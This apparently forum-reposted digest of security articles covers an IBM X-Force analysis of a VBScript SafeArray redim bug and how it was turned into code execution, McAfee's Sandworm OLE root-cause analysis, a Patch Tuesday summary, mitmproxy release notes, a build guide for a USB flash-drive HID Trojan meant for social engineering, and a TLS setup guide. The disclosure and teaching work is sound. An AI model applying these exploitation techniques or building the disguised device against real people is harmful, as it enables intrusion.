Second, it indicates that there may be other bugs still to be discovered that relate more to arbitrary data manipulation than to more conventional vulnerabilities such as buffer overflows and use-after-free issues. These data manipulation vulnerabilities could lead to substantial exploitation scenarios, from the manipulation of data values to remote code execution. In fact, there may be multiple exploitation techniques that lead to possible remote code execution, as is the case with this particular bug. Typically, attackers use remote code execution to install malware, which may have any number of malicious actions, such as keylogging, screen-grabbing and remote access.

IBM X-Force has had product coverage with its network intrusion prevention system (IPS) since reporting this vulnerability back in May 2014, though X-Force hasn't found any evidence of exploitation of this particular bug in the wild. I have no doubt that it would have fetched six figures on the gray market. The proof of concept IBM X-Force built uses a technique that other people have discovered, too. In fact, it was presented at this year's Black Hat USA Conference.

Technical Description

In VBScript, array elements are actually Component Object Model (COM) SafeArrays. Each element is a fixed size of 16 bytes, with an initial WORD indicating the Variant type. Under normal circumstances, one will only have control of a maximum of 8 bytes of this data, through either the Variant type for double values or for currency values.

Array Elements:
| Variant Type (WORD) | Padding (WORD) | Data High (DWORD) | Data Low (DWORD) |

Cutting to the chase, VBScript permits in-place resizing of arrays through the command "redim preserve." This is where the vulnerability is.
redim preserve arrayname( newsizeinelements )

VBScript.dll contains a runtime evaluation method, CScriptRuntime::Run(VAR *), which farms out the SafeArray redimension task to OleAut32.dll with the SafeArrayRedim(...) function. Essentially, what happens is that fairly early on, SafeArrayRedim() will swap out the old array size (element count) with the resize request. However, there is a code path where, if an error occurs, the size is not reset before returning to the calling function, VBScript!CScriptRuntime::Run().

For VBScript, exploitation of this bug could have been avoided by invalidating the common "On Error Resume Next" VBScript code when the OleAut32 library returns with an error. Since it doesn't, one can simply rely on this statement to regain script execution and continue to use "corrupted" objects. This VBScript code snippet is extremely common, and its presence would not indicate that this vulnerability has been exploited.
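To make the root cause mechanical, here is a deliberately simplified Python model of the flow just described (my own abstraction, not OleAut32 code): the element count is swapped early, and the error path returns without restoring it, leaving the script engine with an inflated view of the array.

class SafeArrayModel:
    """Toy model of a SafeArray holding 16-byte variant elements."""

    def __init__(self, count):
        self.count = count                       # element count the engine trusts
        self.storage = bytearray(16 * count)     # actual backing allocation

    def redim_preserve(self, new_count, fail=False):
        self.count = new_count       # size swapped out early, as in SafeArrayRedim()
        if fail:                     # e.g. the reallocation fails...
            return 0x8007000E        # ...and we return WITHOUT restoring self.count
        self.storage = self.storage[:16 * new_count].ljust(16 * new_count, b"\x00")
        return 0

arr = SafeArrayModel(4)
hr = arr.redim_preserve(1024, fail=True)   # "On Error Resume Next" swallows the error
assert arr.count == 1024                   # engine now believes 1024 elements exist...
assert len(arr.storage) == 16 * 4          # ...over a 4-element allocation

Everything that follows in the write-up is about turning that stale size field into controlled out-of-bounds reads and writes.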
Exploitation of Vulnerability

This is the fun part. Although the bug originates in some very old code within the OleAut32 library, I'm approaching exploitation from the perspective of VBScript within Internet Explorer, because all versions since 3.0 are vulnerable through this vector. Exploitation is tricky, partially because array elements are a fixed size. Yet there are two additional issues that complicate exploitation. The first is that there is little opportunity to place arbitrary data where VBScript arrays are stored on the IE heap. The second issue is that, assuming you are now addressing outside the bounds of your VBScript array (SafeArray), you will find the unpleasant enforcement of Variant type compatibility matching.

In the end, the key to exploitation toward reliable code execution was to take advantage of the difference between the element alignment of the arrays (16 bytes) and the alignment of the Windows heap (8 bytes). This provides opportunities to change the Variant type in an element of an adjacent array and to read that content back through the original array reference.

In short, with this kind of memory manipulation available, an attacker can do a number of things. One possibility is to create arbitrary dispatch pointers for VT_DISPATCH or VT_UNKNOWN types. This can lead to Data Execution Prevention (DEP) firing if the specified pointer does not correspond to a memory address with execution enabled. There are ways around that, too, but I'll return to that later.

Another possibility would be to use this attack to grab some heap data, but that is a little inconvenient because, again, you run into Variant type compatibility matching. If the location outside of the array boundary that would hold the Variant type is not a known Variant ID or combination on a read operation, or if it is not directly compatible on a write operation, nothing further will happen. However, again, one can abuse the Variant type of objects in the array. So if attackers start with a BSTR and create a Unicode representation of the data they want another type to point to, it can be used to create objects that can lead to more elaborate exploits. At the time I made the vulnerability discovery, I also happened to run across a blog post hinting that a combination of VT_ARRAY and VT_VARIANT could be useful in this respect. Massaging the data for the VT_VARIANT|VT_ARRAY object permits the use of any virtual address instead of being stuck with the relative addresses of the array boundaries we resized.

Furthermore, as we are now dealing with an array of variants, we can use the vartype() command to obtain 16 bits of information from any address we specify. The reason for the 16 bits is just that COM variants max out at 16 bits of data. While we still have to deal with the variant compatibility enforcement, many exciting possibilities now exist. One of these possibilities permits a data-only attack.

The next step for this possibility leverages a memory leak leading to the VBScript class object instance. Content can be left behind in the array data that was never intended to be read. By again changing the variant type of an object in the adjacent array, we can read information that ends up being the pointer to the VBScript class object.

Coincidentally, multiple security researchers may have noticed that both Jscript and VBScript from Microsoft have a check to see whether they are running in a safe mode, such as at the command prompt. This check looks at a member of the VBScript (or Jscript) class object to see whether it is in this safe mode. Another great coincidence is that not only can we reliably get to this location in memory using the address leak just discussed, but the nearby data in memory should always pass the variant type compatibility test, permitting us to change the value and get code execution indirectly through running unsafe COM objects (think ActiveX) with arbitrary parameters. This is the same attack technique that Yang Yu presented at the Black Hat USA conference this year, called the "Vital Point Strike." Using this approach, which does not use shellcode or more exotic means such as return-oriented programming gadgets, both the EPM sandbox in IE and Microsoft's EMET tool are bypassed.

Let's return to DEP for a moment. There are options here. For example, if there is any read+write+execute (+RWE) memory in a predictable location, we can manipulate objects to point to that memory. Similarly, we could create a large BSTR by pointing a BSTR to the +RWE memory and using the arbitrary write on top of null characters from the +RWE memory to set a large size. The hope is that we could do some in-place modifications with Unicode representations of shellcode. I haven't tested this out, but it is an interesting idea. Subsequently, we could create arbitrary VT_DISPATCH or VT_UNKNOWN pointers that enable us to point back into the +RWE under our control. However, loading objects or plugins known to create +RWE by default is still a bit of a hassle.

If we have the ability to read arbitrary memory and create arbitrary VT_DISPATCH and VT_UNKNOWN pointers, and we have some ability to control data in memory, either through ordinary heap data we can use with our VBScript and/or data we can touch and change (compatibility testing passes), we should have no trouble creating Windows API calls. This happens to be another method Yang presented, called "Interdimensional Code Execution." In fact, using it to disable DEP is possible, but somewhat of a waste of an elegant approach for a sledgehammer result.

Hopefully, if you've made it this far, you have a pretty good idea how powerful the data attacks facilitated by this bug can be. Again, our disclosure was originally submitted a number of months ago, and while we are not exclusive with the exploitation techniques described, it contributes well toward our goal of describing a significant vulnerability and how it was turned into a viable proof-of-concept attack toward disclosure.
We incorporated product coverage for the OLE vulnerability into our network IPS, and so far, the signature we developed has not fired. However, for the attack techniques discussed, I think it is only a matter of time before we see them in the wild.

Sursa: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows
12. Bypassing Microsoft's Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause
By Haifei Li on Nov 11, 2014

On October 21, we warned the public that a new exploitation method could bypass Microsoft's official patch (MS14-060, KB3000869) for the infamous Sandworm zero-day vulnerability. As Microsoft has finally fixed the problem today via Security Bulletin MS14-064, it's time to uncover our findings and address some confusion. This is the first of two posts on this issue. (McAfee has already delivered various protections against this threat to our customers.)

Sandworm background

This zero-day attack was disclosed at almost the same time that the patch was made available on the last "Patch Tuesday" (October 14). We found that this is a very serious zero-day attack, not only because the attack targeted many sensitive organizations (such as NATO), but also because of the technical properties of the vulnerability and exploitation.

This vulnerability is a logic fault. It's not related to memory corruption (such as a heap-based overflow or use-after-free), so proven-effective exploitation mitigations such as ASLR and DEP on Windows 7 or later will fail to block the exploit. Nor can Microsoft's enhanced security tool, the Enhanced Mitigation Experience Toolkit (EMET), block the attack by default.

Though the in-the-wild samples are organized as PowerPoint Show (.ppsx) files, the root cause is a vulnerability in the Windows Packager COM object (packager.dll). Considering that COM objects are OS-wide function providers, any application installed on the system can invoke them, which means that other formats can be attack paths as well. This indicates that all Windows users, not only Office users, are at risk.

The attack has been going on for quite a long time. For example, an exploit generator found on VirusTotal suggests that the vulnerability was discovered in June 2013.

Microsoft's patch and two bypasses

On October 17, three days after its release, we found that Microsoft's patch could be bypassed with some tricks. We reported our findings to Microsoft on the same day, which led to an emergency Security Advisory 3010060, released October 21, with a temporary "Fix It." We created a proof of concept (PoC) demonstrating the bypass. We later learned that some other parties, including the Google Security Team, have detected in-the-wild samples that are said to bypass the patch.

We analyzed some samples in the wild and found that they will trigger a user account control (UAC) warning when one logs in with a standard non-administrator account. However, users on an administrator account, or who have disabled the UAC, will not see the warning, and the malicious code will execute automatically. Our PoC takes another path and does not trigger the UAC at all. Thus our PoC is a full bypass, while the in-the-wild samples are a partial bypass.

At the root

The vulnerability exists in the Packager object. In fact, there are two issues rather than one. The first issue allows an attacker to drop an arbitrary file into the temp folder. (We warned the public about this security issue in a July post. Anyone who followed our advice at that time, preventing Office from invoking the Packager object, is immune to the Sandworm attack.) The second issue is the core of the matter. While the former allows only the writing of a file into the temp folder, the latter allows an attacker to "execute" the file from the temp folder. Let's take a closer look at how it works.
Looking at the slide definition XML file inside the .ppsx sample, we find something interesting at the following lines:

[Figure: the "verb" definition in slide1.xml]

The Packager is an OLE object that supports embedding one file into another container application. As described on this MSDN page, OLE objects that provide embedding functions must expose the interface IOleObject. For the preceding XML definition, this calls the DoVerb() method of this IOleObject. Another MSDN page provides the prototype of this method:

[Figure: prototype of the IOleObject::DoVerb() function]

And the following shows the location of the IOleObject interface and the DoVerb() function in packager.dll:

[Figure: the IOleObject interface and the DoVerb() function in packager.dll]

The string "cmd=3" in slide1.xml suggests that the value of the first parameter (iVerb) is 3. Depending on the value of iVerb, we see a switch to different code in IOleObject::DoVerb(). The following is the REed code (source code generated through reverse engineering) for handling iVerb=3 in the IOleObject::DoVerb() function:

[Figure: the REed code for handling iVerb=3 in the IOleObject::DoVerb() function]

With further research and testing, we realized that this code performs the same action as clicking the second item on the following menu after right-clicking the filename, as shown here. (The print in red is our addition.)

[Figure: the right-click menu for a .inf file]

Reading the whole code of IOleObject::DoVerb(), we see that depending on different values of iVerb, the code will switch to different code paths. We split them into two situations.

For iVerb values greater than or equal to 3, the code will perform the same action as clicking on the pop-up menu. As we see in the REed code, it subtracts the fixed value 2 from the iVerb value 3, with the result 1, which represents the second item on the right-click menu. We can also invoke any command below "Install" on the menu by supplying a larger iVerb value. For example, if we want to click the third item on the preceding menu, we can set iVerb=4 ("cmd=4") in the slide definition file.

For an iVerb value less than 3, the program will follow other code that we have not shown. These actions, such as performing the default action (iVerb=2) or renaming the display name of the Packager object (iVerb=1), are handled well from a security point of view.

We are focusing on the first situation: when the iVerb value is greater than or equal to 3, it will effectively click "Install" or a lower choice from the pop-up menu for the specific file. For a .inf file, the right-click menu will appear exactly as in our image for a default Windows setup. Thus, in this example, "InfDefaultInstall.exe" will execute, and various bad things will happen.
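The arithmetic in that switch is worth restating. A one-function Python model of the mapping the REed code performs (illustrative only, not packager.dll source):

def doverb_menu_index(iverb):
    """For iVerb >= 3, packager.dll clicks context-menu entry (iVerb - 2),
    counting from 0, so iVerb=3 hits the second entry ("Install" on a
    default .inf menu) and iVerb=4 the third, as described above."""
    if iverb < 3:
        raise ValueError("iVerb < 3 takes the other, safely handled code path")
    return iverb - 2

assert doverb_menu_index(3) == 1   # second menu item ("Install")
assert doverb_menu_index(4) == 2   # third menu item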
In this post, we have introduced the case and explained the essence of the vulnerability. In a second part, we will discuss the MS14-060 patch, how to bypass it, and more. Watch this space for our next post.

Sursa: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous

13. [h=1]Microsoft patches Windows, IE; holds back two updates[/h]

Summary: The most serious vulnerability could allow an attacker to gain control of a Windows Server just by sending packets. For undisclosed reasons, Microsoft withheld two updates scheduled for release.
By Larry Seltzer for Zero Day | November 11, 2014 -- 19:04 GMT (11:04 PST)

Microsoft today released 14 security updates to address 33 vulnerabilities in Windows, Internet Explorer and Office. Two updates scheduled for release today (MS14-068 and MS14-075) were withheld, and their release date is yet to be determined. The most severe of the vulnerabilities may be MS14-066, which could allow remote, unauthenticated compromise of Windows servers. Two of the vulnerabilities are being exploited in the wild. For one of them, Microsoft had previously released a "Fix it" to block the known attacks.

MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) -- Two vulnerabilities could allow system exploit through an OLE client such as PowerPoint. One is being exploited in the wild and is the one for which Microsoft provided a Fix it. That Fix it only addresses specific attacks, whereas this update fixes the underlying vulnerability. See the Microsoft KB page for a link to remove the Fix it.

MS14-065: Cumulative Security Update for Internet Explorer (3003057) -- This update fixes 17 vulnerabilities in Internet Explorer. Many are rated critical and all versions of IE are affected. Internet Explorer 11, the most current version, has six vulnerabilities rated critical. Microsoft also says that working exploit code is possible for nearly all of the 17.

MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) -- This is a highly severe vulnerability that could allow an attacker to execute code on a Windows Server in a highly privileged context just by sending specially crafted packets to it. Microsoft lists no mitigating factors.

MS14-067: Vulnerability in XML Core Services Could Allow Remote Code Execution (2993958) -- A malicious web site could compromise a client through Internet Explorer.

MS14-069: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (3009710) -- Word 2007 SP3, the Word Viewer and Office Compatibility Pack Service Pack 3 can all be exploited through specially crafted files.

MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) -- An attacker can gain elevated privilege through a flaw in the Windows TCP/IP client (IPv4 or IPv6).

MS14-071: Vulnerability in Windows Audio Service Could Allow Elevation of Privilege (3005607) -- This vulnerability would need to be used along with another in order to be exploited.

MS14-072: Vulnerability in .NET Framework Could Allow Elevation of Privilege (3005210) -- An attacker could gain elevated privilege by sending specially crafted data to a client or server that uses .NET Remoting. All versions of Windows are affected.

MS14-073: Vulnerability in Microsoft SharePoint Foundation Could Allow Elevation of Privilege (3000431) -- An authenticated attacker could run arbitrary script at server privileges on Microsoft SharePoint Foundation 2010 Service Pack 2.

MS14-074: Vulnerability in Remote Desktop Protocol Could Allow Security Feature Bypass (3003743) -- An RDP (Remote Desktop Protocol) system could be induced not to log events properly, but Microsoft considers working exploit code unlikely.
MS14-076: Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) -- A user could bypass IIS restrictions on users and IP addresses. Microsoft considers working exploit code unlikely.

MS14-077: Vulnerability in Active Directory Federation Services Could Allow Information Disclosure (3003381) -- If a user leaves a browser open after logging out of an application, another user could reopen the application in the browser immediately after the first user logged off. Microsoft considers a working exploit unlikely.

MS14-078: Vulnerability in IME (Japanese) Could Allow Elevation of Privilege (3005210) -- Sandbox escape is possible in the IME (Input Method Editor) (Japanese). This attack is being exploited in the wild.

MS14-079: Vulnerability in Kernel Mode Driver Could Allow Denial of Service (3002885) -- If a user used Windows Explorer to browse a network share that contained a specially crafted TrueType font, the system could become unresponsive.

Users of Microsoft's EMET (Enhanced Mitigation Experience Toolkit), a tool for hardening applications against attack, should upgrade the tool to the new version 5.1 before applying today's Internet Explorer updates. Microsoft has said that the updates cause problems for users of version 5.0 of EMET.

The MS14-066 update also includes support for new SSL/TLS cipher suites. The new suites "...all operate in Galois/counter mode (GCM), and two of them offer perfect forward secrecy (PFS) by using DHE key exchange together with RSA authentication."

Microsoft also released a new version of Flash Player integrated into Internet Explorer 10 and 11 to address vulnerabilities disclosed today by Adobe.

The new version of the Windows Malicious Software Removal Tool (KB890830) removes malware from the Win32/Tofsee and Win32/Zoxpng families, according to a blog from the Microsoft Malware Protection Center.

Microsoft also released several non-security updates. Based on prior experience, the links to these will become live through the course of the day Tuesday.

Update for Windows 8.1, Windows RT 8.1, Windows 8, and Windows RT (KB2976536)
Update for Windows 8, Windows RT, and Windows Server 2012 (KB3000853)
Update for Windows 8 and Windows RT (KB3003663)
Update for Windows 8.1 and Windows RT 8.1 (KB3003667)
Update for Windows 8.1 (KB3003727)
Update for Windows 7 (KB3004469)
Update for Windows 8.1, Windows Server 2012 R2, Windows 8, Windows Server 2012, Windows 7, Windows Server 2008 R2, and Windows Server 2008 (KB3004908)
Update for Windows 8.1 and Windows RT 8.1 (KB3006178)
Update for Windows 8.1 for x64-based Systems (KB3006958)
Update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 (KB3008188)
Update for Windows 8.1, Windows RT 8.1, Windows Server 2012 R2, Windows 8, Windows RT, Windows Server 2012, Windows 7, Windows Server 2008 R2, and Windows Server 2008 (KB3008627)

Sursa: Microsoft patches Windows, IE; holds back two updates | ZDNet

UPDATE YOUR WINDOWS!
14. [h=1]mitmproxy and pathod 0.11[/h]

07 November 2014

I'm happy to announce that we've just released v0.11 of both mitmproxy and pathod. This release features a huge revamp of mitmproxy's internals and a long list of important features. Pathod has much improved SSL support and fuzzing. Our thanks to the many testers and contributors that helped get this out the door. Please lodge bug reports and feature requests here.

[h=1]MITMPROXY CHANGELOG[/h]

Performance improvements for mitmproxy console
SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server
Data streaming for response bodies exceeding a threshold (bradpeabody@gmail.com)
Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic untouched
Finer-grained control of traffic replay, including options to ignore contents or parameters when matching flows (marcelo.glezer@gmail.com)
Pass arguments to inline scripts
Configurable size limit on HTTP request and response bodies
Per-domain specification of interception certificates and keys (see --cert option)
Certificate forwarding, relaying upstream SSL certificates verbatim (see --cert-forward)
Search and highlighting for HTTP request and response bodies in mitmproxy console (pedro@worcel.com)
Transparent proxy support on Windows
Improved error messages and logging
Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com)
Content view mode for WBXML (davidshaw835@air-watch.com)
Better documentation, with a new section on proxy modes
Generic TCP proxy mode
Countless bugfixes and other small improvements

[h=1]PATHOD CHANGELOG[/h]

Hugely improved SSL support, including dynamic generation of certificates using the mitmproxy cacert
pathoc -S dumps information on the remote SSL certificate chain
Big improvements to fuzzing, including random spec selection and memoization to avoid repeating randomly generated patterns
Reflected patterns, allowing you to embed a pathod server response specification in a pathoc request, resolving both on the client side. This makes fuzzing proxies and other intermediate systems much better.
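As a quick taste of the inline-script features mentioned in the mitmproxy changelog above (script arguments in particular), here is a minimal sketch in the 0.11-era inline-script style. The (context, flow) hook signature is my recollection of that era's API, and the header name is made up, so treat this as an assumption-laden illustration rather than reference code:

# tagger.py -- run with:  mitmproxy -s "tagger.py X-Tagged"

def start(context, argv):
    # argv holds the script's own arguments, per the new
    # "pass arguments to inline scripts" feature noted above.
    context.header_name = argv[1] if len(argv) > 1 else "X-Tagged"

def response(context, flow):
    # Tag every proxied response so the interception is visible client-side.
    flow.response.headers[context.header_name] = ["mitmproxy"]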
Sursa: cortesi - mitmproxy and pathod 0.11

15. [h=3]Making a USB flash drive HW Trojan[/h]

[h=2]Preface[/h]

When I first read Adrian Crenshaw's [1] and Netragard's [2] articles about malicious Human Interface Devices (HID), I was really impressed and decided to create my own, just to try out how hard it is to assemble one and see if there's any space for improvements. My first attempt was a USB flash drive-like tool. The main goal was to make it as small and convincing-looking as possible. The result was a device in an enclosure with the dimensions of 8.7mm x 71mm x 23mm, fancy enough to fool someone in a social engineering engagement.

Now, the above mentioned articles have a lot of details about malicious HIDs, mostly about how to program them, but they say little about how to MAKE them. So in this blog post, I will give you a step-by-step tutorial on how to prepare a USB flash drive HW Trojan (actually, you can use it as a neat, fully functional USB drive as well) using a Teensy 2.0 and a Teensy SD Adaptor. I am going to assume that you have at least some basic experience with soldering. If you don't have any, take a look at Limor Fried's (a.k.a. ladyada) page about the basics of soldering or Sparkfun's Soldering Basics (it takes about 30-40 minutes of practicing to learn how to solder through-hole components).

[h=2]Parts needed[/h]

Teensy 2.0
Teensy SD Adaptor (you can use other SD card adaptors too, but the Teensy SD Adaptor is one of the smallest on the market)
Micro SD Card (you can use a Micro SDHC Card as well, up to 16 GB)
USB A type plug (male) PCB connector (I would NOT recommend using a cable connector, since it's bigger. It doesn't matter if you use an SMD or through-hole type, but I prefer the through-hole type)
USB MINI-B type plug (male) cable connector (I would NOT recommend using a PCB connector, since it's bigger.)
Enclosure (I used this one, but it's transparent, so it's probably better for demonstration purposes and not the best for social engineering. I would recommend using something like this, or you can paint the transparent one whatever color you want)
Wires (I would suggest using at least 6-7 different colors)

Anyway, here's a picture of all the parts together, except the wires:

[h=2]Tools needed[/h]

Solder (for soldering, of course)
Soldering iron (yep, this one is also for soldering)
Desoldering tool or (de)solder braid (if you are clumsy and make a soldering error, like an unwanted short circuit)
Hot glue gun (I used this for the USB A to USB MINI-B converter, but you can use whatever glue/solution you want)
Flush/diagonal cutters (for cutting the wires)
Third hand with magnifying glass (you're gonna need it, otherwise you would have to grow a third hand)
Good light (without this, you won't be able to solder those tiny little wires...)

[h=2]STEP 1: Make a small USB A type plug (male) connector to USB MINI-B type plug (male) connector converter[/h]

The first thing we need to prepare is a USB connector converter, since the Teensy 2.0 has a USB MINI-B type jack (female) USB connector, but PCs/laptops usually only have USB A type jack (female) connectors. We need to make one of our own in order to reduce the size of our device. As you will see in the pictures below, the converters you can buy are all nice and shiny, but the one I made is almost 2/3 of their size.

TIP: Alternatively, you can de-solder the USB MINI connector from the Teensy and connect the pins directly to a USB A type connector, thus making the whole device even smaller (I preferred keeping my Teensy intact for this prototype).
First, let's take a look at pinout.ru for the USB pinout and wiring! As you can see, USB has only 4 pins, or 5 in the case of USB MINI, but we can ignore this 5th ID pin for now. Now, the thing is that I don't have pictures of soldering the wires one by one, but I drew a few figures about the wiring, so the only thing you need to do is connect the pins of the connectors by soldering in the wires according to these instructions. First, let's see the two connectors with the pins! (Sidenote: sorry for the lame pictures... at the time I wrote the post I didn't have any USB connectors with me to make my own photos, so I took something from the Internet. Still, I hope you'll get the general idea from these as well.) For the USB A type plug connector, the pins are the following: I like folding the two legs of the metal part on the USB A connector (the ones in the red circles on the picture) to the side, so its overall height will be the height of the connector, and it will also help keep the Teensy in one place inside the enclosure (you will see this on the pictures below); or, you can just cut them off. If you buy a USB MINI-B type plug connector, it usually comes "unassembled" in three or four parts, but you only need the following two parts (pins are numbered on the "actual" connector part): You should cut off half of the metallic part (along the red dotted line), get rid of the part marked with a red X on the picture and only keep the part holding the "actual" connector part (marked with a green check mark on the picture). IMPORTANT: The side where I marked the pins is NOT the one where you will have to solder the wires! It's on the other side! Obviously, the order of the pins is the same on the other side as well. (Sorry, but I couldn't find a good picture on the Internet to mark the pins on the side where you actually need to do the soldering. I hope you will be able to figure this one out on your own.) And now, let's see how we should connect them! It's pretty simple: basically, you just have to connect each pin of one connector to the same pin of the other connector. I like using red (pin 1), white (pin 2), green (pin 3) and black (pin 4) wires when I work with USB, so I can easily distinguish which wire goes into which pin (the lines on the picture also follow this convention). Make sure that you use wires as short as possible, ideally no longer than 1 cm, so they don't need much space. Soldering can be quite tricky, but keep trying until you succeed, otherwise it won't fit into the enclosure. Once you have them wired up, you can use, for example, a hot glue gun to cover the solder joints and protect them from falling apart. Here's a picture of the commercially available and the home-made connectors from the "bottom": Same thing, from the "top": Last, but not least, from the side: As you can see, the result is quite small and thin (even though it's a bit ugly, but this is not a beauty contest), so it won't take up a lot of valuable space in the enclosure. [h=2] STEP 2: Connecting the Teensy with the Teensy SD Adaptor[/h] The next step is to connect the Teensy with the Teensy SD Adaptor. Like I said, you can use a different SD card adapter too, but this one fits nicely on top of a Teensy, so I will give instructions for this adapter. You can find the technical documentation for the Teensy SD Adaptor on the PJRC website.
The most important part is the pinout of the adapter (I took the liberty of reusing the pictures from the PJRC website): We need to connect the MISO, MOSI, SCLK, SS, Ground and +5V pins. The SW (switch) pin is not needed for now, but you can solder it too (I did, so you will see that the SW pin is connected on the pictures below). The way you need to connect the Teensy with the Teensy SD Adaptor is the following: Note that, according to the above picture, the Teensy's top side will face towards the top side of the Teensy SD Adaptor. Once you place a Micro SD card into the card slot, the Teensy SD Adaptor will fit perfectly between the USB connector of the Teensy and the push button. IMPORTANT: The top side of the Teensy SD Adaptor has the metallic surface of the Micro SD card slot that will be in contact with the top side of the Teensy board. When you plug the assembled Teensy into a USB port, the microcontroller will get really hot, really fast. This is because the metallic part of the SD card adaptor short-circuits the capacitors on the Teensy's top as you squeeze them together. To prevent this from happening, I used a small piece of insulation tape stuck on the metallic part of the Micro SD card slot. The end result from the top should look like this: Notice that the wires on the top are placed next to each other and don't cross, so they won't increase the height of the final product. Same thing, from one side: From the other side (barely visible, but you can see the small piece of black insulation tape too): [h=2] STEP 3: Putting everything together[/h] The last thing we need to do is connect the USB A to USB MINI-B converter to the Teensy + Teensy SD Adaptor part and put them into an enclosure. The two parts connected together should look something like this: Putting them into a nice casing: [h=2]Final product[/h] Aaand, that's all! Later, I will write a detailed blog post on how you can program such a device and what evil payloads you can use. There are a few other pictures I have made and some additional resources on malicious HIDs that you can find below. Final product from the "top": Final product from the side: When the device is plugged into a PC: [h=2]Resources[/h] [1] Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device [2] Netragard's Hacker Interface Device (HID) http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid Posted by Dávid Szili at 10:44:00 AM Sursa: Jump ESP, jump!: Making a USB flash drive HW Trojan
  16. Deploying TLS the hard way October 27th, 2014
- How does TLS work?
- The certificate
- (Perfect) Forward Secrecy
- Choosing the right cipher suites
- HTTP Strict Transport Security
- HSTS Preload List
- OCSP Stapling
- HTTP Public Key Pinning
- Known attacks
Last weekend I finally deployed TLS for timtaubert.de and decided to write up what I learned on the way, hoping that it would be useful for anyone doing the same. Instead of only giving you a few buzzwords, I want to provide background information on how TLS and certain HTTP extensions work and why you should use them or configure TLS in a certain way. One thing that bugged me was that most posts only describe what to do, but not necessarily why to do it. I hope you appreciate me going into a little more detail to end up with the bigger picture of what TLS currently is, so that you will be able to make informed decisions when deploying yourselves. To follow this post you will need some basic cryptography knowledge. Whenever you do not know or understand a concept, you should probably just head over to Wikipedia and take a few minutes, or just do it later and maybe re-read the whole thing. Disclaimer: I am not a security expert or cryptographer, but did my best to research this post thoroughly. Please let me know of any mistakes I might have made and I will correct them as soon as possible. But didn't Andy say this is all shit? I read Andy Wingo's blog post too and I really liked it. Everything he says in there is true. But what is also true is that TLS with the few add-ons is all we have nowadays, and we had better make the folks working for the NSA earn their money instead of not trying to encrypt traffic at all. After you finish reading this page, maybe go back to Andy's post and read it again. You might have a better understanding of what he is ranting about than you had before, if the details of TLS are still dark matter to you. So how does TLS work? Every TLS connection starts with both parties sharing their supported TLS versions and cipher suites. As the next step the server sends its X.509 certificate to the browser. Checking the server's certificate The following certificate checks need to be performed:
- Does the certificate contain the server's hostname?
- Was the certificate issued by a CA that is in my list of trusted CAs?
- Does the certificate's signature verify using the CA's public key?
- Has the certificate expired already?
- Was the certificate revoked?
All of these are crucial checks. To query a certificate's revocation status the browser will use the Online Certificate Status Protocol (OCSP), which I will describe in more detail in a later section. After the certificate checks are done and the browser has ensured it is talking to the right host, both sides need to agree on secret keys they will use to communicate with each other. Key Exchange using RSA A simple key exchange would be to let the client generate a master secret and encrypt that with the server's public RSA key given by the certificate. Both client and server would then use that master secret to derive symmetric encryption keys that will be used throughout this TLS session. An attacker could however simply record the handshake and session for later, when breaking the key has become feasible or the machine proves susceptible to a vulnerability. They may then use the server's private key to recover the whole conversation. Key Exchange using (EC)DHE When using (Elliptic Curve) Diffie-Hellman as the key exchange mechanism, both sides have to collaborate to generate a master secret.
They generate DH key pairs (which is a lot cheaper than generating RSA keys) and send their public key to the other party. With the private key and the other party's public key the shared master secret can be calculated and then again be used to derive session keys. We can provide Forward Secrecy when using ephemeral DH key pairs. See the section below on how to enable it. We could in theory also provide forward secrecy with an RSA key exchange if the server generated an ephemeral RSA key pair, shared its public key, and then waited for the master secret to be sent by the client. As hinted above, RSA key generation is very expensive and does not scale in practice. That is why RSA key exchanges are not a practical option for providing forward secrecy. After both sides have agreed on session keys the TLS handshake is done and they can finally start to communicate using symmetric encryption algorithms like AES that are much faster than asymmetric algorithms. The certificate Now that we understand authenticity is an integral part of TLS, we know that in order to serve a site via TLS we first need a certificate. The TLS protocol can encrypt traffic between two parties just fine, but the certificate provides the necessary authentication towards visitors. Without a certificate a visitor could securely talk to either us, the NSA, or a different attacker, but they probably want to talk to us. The certificate ensures by cryptographic means that they established a connection to our server. Selecting a Certificate Authority (CA) If you want a cheap certificate, have no specific needs, and only a single subdomain (e.g. www), then StartSSL is an easy option. Do of course feel free to take a look at different authorities; their services and prices will vary heavily. In the chain of trust the CA plays an important role: by verifying that you are the rightful owner of your domain and signing your certificate, it will let browsers trust your certificate. The browsers do not want to do all this verification themselves so they defer it to the CAs. For your certificate you will need an RSA key pair, a public and private key. The public key will be included in your certificate and thus also signed by the CA. Generating an RSA key and a certificate signing request The example below shows how you can use OpenSSL on the command line to generate a key for your domain. Simply replace example.com with the domain of your website. example.com.key will be your new RSA key and example.com.csr will be the Certificate Signing Request that your CA needs to generate your certificate. openssl req -new -newkey rsa:4096 -nodes -sha256 \ -keyout example.com.key -out example.com.csr We will use a SHA-256 based signature for integrity, as Firefox and Chrome will phase out support for SHA-1 based certificates soon. The RSA keys used to authenticate your website will use a 4096 bit modulus. If you need to handle a lot of traffic or your server has a weak CPU you might want to use 2048 bit. Never go below that, as keys smaller than 2048 bit are considered insecure. Get a signed certificate Sign up with the CA you chose, and depending on how they handle this process you probably will have to first verify that you are the rightful owner of the domain that you claim to possess. StartSSL will do that by sending a token to postmaster@example.com (or similar) and then ask you to confirm the receipt of that token.
